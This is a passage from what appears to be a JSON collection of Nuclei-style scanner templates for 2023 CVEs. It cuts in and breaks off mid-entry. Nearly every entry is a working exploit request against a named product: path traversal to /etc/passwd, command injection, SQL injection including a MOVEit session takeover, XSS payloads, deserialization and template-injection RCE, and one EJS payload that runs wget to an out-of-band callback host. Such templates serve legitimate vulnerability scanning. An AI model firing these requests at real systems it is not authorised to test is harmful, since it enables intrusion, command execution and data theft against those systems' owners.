Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"server","words":["KM-MFP"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41892","info":{"name":"CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n"],"matchers":[{"type":"word","words":["PHP Credits","PHP Group","CraftCMS"],"condition":"and","case-insensitive":true}]}]},{"id":"CVE-2023-30013","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\n\n{\"command\":\"127.0.0.1; ls>../{{randstr}};#\",\"num\":\"230\",\"topicurl\":\"setTracerouteCfg\"}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["lan_ip","reserv"],"condition":"and"},{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46574","info":{"name":"TOTOLINK A3700R - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"<title>TOTOLINK</title>\")"],"condition":"and"}]},{"raw":["GET /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\n\n{\"topicurl\":\"UploadFirmwareFile\",\"FileName\":\";id\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29084","info":{"name":"ManageEngine ADManager Plus - Command Injection","severity":"high"},"requests":[{"raw":["POST /j_security_check HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nis_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator\n","GET /home.do HTTP/1.1\nHost: {{Hostname}}\n","POST /api/json/admin/saveServerSettings HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nparams=[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"1.1.1.1\",\"USER_NAME\":\"random\",\"PASSWORD\":\"asd\\r\\n{{cmd}}\",\"PORT\":\"80\"}]&admpcsrf={{admpcsrf}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"message\":\"","Proxy Settings"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"kval","name":"admpcsrf","internal":true,"kval":["admpcsrf"],"part":"header"}]}]},{"id":"CVE-2023-0777","info":{"name":"modoboa  2.0.4 - Admin TakeOver","severity":"critical"},"requests":[{"raw":["GET /accounts/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /accounts/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F\n","GET /dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["password"]},"attack":"pitchfork","host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"Dashboard\") && contains(body_3, \"Hello admin\")"],"condition":"and"}],"extractors":[{"type":"regex","part":"header","name":"csrftoken","internal":true,"group":1,"regex":["csrftoken=([A-Za-z0-9]+)"]}]}]},{"id":"CVE-2023-20888","info":{"name":"VMware Aria Operations for Networks - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/events/push-notifications HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: application/json\n\n{\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-44813","info":{"name":"mooSocial v.3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;'"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["initInviteFriendBtn('model');alert(document.domain)//;"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0948","info":{"name":"WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=peachpay&tab=field&\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"peachpay\")"],"condition":"and"}]}]},{"id":"CVE-2023-38992","info":{"name":"Jeecg-Boot v3.5.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username","{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username"],"payloads":{"path":[null,"jeecg-boot/"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"parentId\\\":\", \"key\\\":\", \"{\\\"title\", \"success\\\":true\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27034","info":{"name":"Jms Blog - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(tolower(body), \"jmsblog\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nPOST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\nX-Requested-With: XMLHttpRequest\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"comment\"\n\n555\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"customer_name\"\n\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"email\"\n\n0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id_comment_reply\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"submitComment\"\n\nsubmitComment=\n------------YWJkMTQzNDcw--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["duration>=6"]}]}]},{"id":"CVE-2023-29204","info":{"name":"XWiki - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me","{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-39141","info":{"name":"Aria2 WebUI - Path traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/../../../../etc/passwd"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Aria2 WebUI\")","regex(\"root:x:0:0:\",body_2)"],"condition":"and"}]}]},{"id":"CVE-2023-27640","info":{"name":"PrestaShop tshirtecommerce - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(base64_decode(body), \"PrestaShop\", \"<?php\")"],"condition":"and"}]}]},{"id":"CVE-2023-6021","info":{"name":"Ray API - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nodes?view=summary","{{BaseURL}}/api/v0/logs/file?node_id={{nodeid}}&filename=../../../../../etc%2fpasswd&lines=50000"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["root:.*:0:0:"]},{"type":"word","part":"header_2","words":["text/plain","aiohttp"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"nodeid","json":["..|objects|.nodeId//empty[0]"]}]}]},{"id":"CVE-2023-45375","info":{"name":"PrestaShop PireosPay - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/modules/pireospay/\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20\nPOST /module/pireospay/validation HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\najax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-30019","info":{"name":"Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["Invalid source image"]},{"type":"status","status":[422]}]}]},{"id":"CVE-2023-34659","info":{"name":"JeecgBoot 3.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/show HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XPATH syntax error:","SQLException"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-31548","info":{"name":"ChurchCRM v4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nFundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\\\" autofocus=\\\"\\\"></td>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-22463","info":{"name":"KubePi JwtSigKey - Admin Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /kubepi/api/v1/users HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n\n{\n  \"authenticate\": {\n       \"password\": \"{{password}}\"\n  },\n  \"email\": \"{{email}}\",\n  \"isAdmin\": true,\n  \"mfa\": {\n          \"enable\": false\n   },\n  \"name\": \"{{name}}\",\n  \"nickName\": \"{{nickname}}\",\n  \"roles\": [\n  ]\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"password\":","\"isAdmin\":","\"createAt\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47246","info":{"name":"SysAid Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /userentry?accountId=/../../../tomcat/webapps/{{directory}}/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{ hex_decode('789c0bf06666e16200819c8abcf02241510f4e201b84851864189cc35c758d0c8c8c754dcc8d4cccf44a2a4a42433819981fdb05a79e63f34b2dade0666064f9cac8c0c0023201a83a3ec43538842bc09b91498e1997b1126071a026862d8d506d1896b0422c41b320c09b950da2979121024887824d02000d3f1fcb') }}\n","@timeout: 15\nGET /{{directory}}/CVE-2023-47246.txt?{{wait_for(9)}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200"]}]}]},{"id":"CVE-2023-2732","info":{"name":"MStore API <= 3.9.2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/add-listing?id=1 HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["email-description","Username"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6568","info":{"name":"Mlflow - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/2.0/mlflow/users/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: <script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Invalid content type:"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-29827","info":{"name":"Embedded JavaScript(EJS) 3.1.6 - Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2023-34960","info":{"name":"Chamilo Command Injection","severity":"critical"},"requests":[{"raw":["POST /main/webservices/additional_webservices.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{RootURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type=\"ns2:Map\"><item><key xsi:type=\"xsd:string\">file_data</key><value xsi:type=\"xsd:string\"></value></item><item><key xsi:type=\"xsd:string\">file_name</key><value xsi:type=\"xsd:string\">`{}`.pptx'|\" |cat /etc/passwd||a #</value></item><item><key xsi:type=\"xsd:string\">service_ppt2lp_size</key><value xsi:type=\"xsd:string\">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"part":"body"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33568","info":{"name":"Dolibarr Unauthenticated Contacts Database Theft","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"database_user\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22620","info":{"name":"SecurePoint UTM 12.x Session ID Leak","severity":"high"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n","POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"status\":\"OK\""]},{"type":"word","part":"header_2","words":["application/json"]}],"extractors":[{"type":"regex","name":"session","group":1,"regex":["\"sessionid\": \"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2023-38203","info":{"name":"Adobe ColdFusion - Deserialization of Untrusted Data","severity":"critical"},"requests":[{"raw":["POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-4113","info":{"name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Select Service(s)\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-39677","info":{"name":"PrestaShop MyPrestaModules - PhpInfo Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/simpleimportproduct/send.php?phpinfo=1","{{BaseURL}}/modules/updateproducts/send.php?phpinfo=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2023-26469","info":{"name":"Jorani 1.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /session/login HTTP/1.1\nHost: {{Hostname}}\n","POST /session/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword\n","GET /pages/view/log-{{date_time(\"%Y-%M-%D\")}} HTTP/1.1\nHost: {{Hostname}}\nX-REQUESTED-WITH: XMLHttpRequest\n{{header}}: CVE-2023-26469\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["7cca0844e81cd333152def045fe075c2"]},{"type":"status","part":"header_3","status":[401]}],"extractors":[{"type":"regex","part":"body","group":1,"internal":true,"name":"csrf","regex":["name=\"csrf_test_jorani\" value=\"(.*?)\""]}]}]},{"id":"CVE-2023-44352","info":{"name":"Adobe Coldfusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}//{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}/{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm","{{BaseURL}}//{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm","{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm","{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm","{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/{{string}}\"><img src=a onerror=alert(document.domain)>","\"{{string}}\"><script>alert(document.domain)</script>"],"condition":"or"},{"type":"dsl","dsl":["contains(body, 'ColdFusion')","contains(header, 'text/html')"],"condition":"and"}]}]},{"id":"CVE-2023-1780","info":{"name":"Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"re not allowed to view\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-48728","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/functiongetOpenGraph.php?videoName=123+--><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"<script>alert(document.domain)</script>\", \"OpenGraph no video\")","status_code == 200 || status_code == 500","contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-3710","info":{"name":"Honeywell PM43 Printers - Command Injection","severity":"critical"},"requests":[{"raw":["POST /loadfile.lp?pageid=Configure HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"]},{"type":"word","part":"body","words":["Release date"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6389","info":{"name":"WordPress Toolbar <= 2.2.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-51449","info":{"name":"Gradio Hugging Face - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"files\";filename=\"okmijnuhbygv\"\nContent-Type: application/octet-stream\n\n{{str}}\n-----------------------------250033711231076532771336998311--\n","GET /file={{download_path}}{{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"download_path","internal":true,"group":1,"regex":["\\[\"(.+)okmijnuhbygv\"\\]"]}],"payloads":{"path":["..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","../../../../../../../../../../../../../../../etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5375","info":{"name":"Mosparo < 1.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/project/switch/1?targetPath=http://oast.pro"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"]}]}]},{"id":"CVE-2023-6018","info":{"name":"Mlflow - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\", \"source\": \"http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\", \"source\": \"models:/{{model_name}}/1\"}\n","GET /model-versions/get-artifact?path=random&name={{model_name}}&version=2 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["\"registered_model\":","\"name\":"],"condition":"and"}]}]},{"id":"CVE-2023-50719","info":{"name":"XWiki < 4.10.15 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=","{{BaseURL}}/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["hash:SHA</span>","XWikiUsers[0].password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34362","info":{"name":"MOVEit Transfer - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nCookie: siLockLongTermInstID=0\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyUsername: Guest\nX-siLock-SessVar1: MyPkgAccessCode: 123\nX-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@oast.me\nCookie: siLockLongTermInstID=0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: siLockLongTermInstID=0\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nArg06=123\n","@Host: https://checkip.amazonaws.com\nGET / HTTP/1.1\nHost: checkip.amazonaws.com\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyPkgID: 0\nX-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE 